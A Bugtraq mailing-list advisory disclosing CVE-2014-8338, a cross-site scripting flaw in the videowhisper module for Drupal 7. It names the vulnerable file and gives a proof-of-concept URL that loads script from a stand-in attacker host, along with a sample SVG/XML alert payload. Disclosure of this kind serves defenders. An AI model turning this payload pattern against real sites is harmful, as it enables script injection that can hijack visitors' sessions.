[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper
- From: mdgh9@xxxxxxxxx
- Date: Thu, 6 Nov 2014 07:11:41 GMT
Hello,
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for
Drupal 7.
Vendor Notification: 22, Oct 2014
Vulnerable file:
drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
POC:
http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt
The content of xss.txt:
<root>
<script xmlns="http://www.w3.org/2000/svg";><![CDATA[
alert('XSS');
]]></script>
</root>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's
Scientific Excellence and Research Centers.
Best regards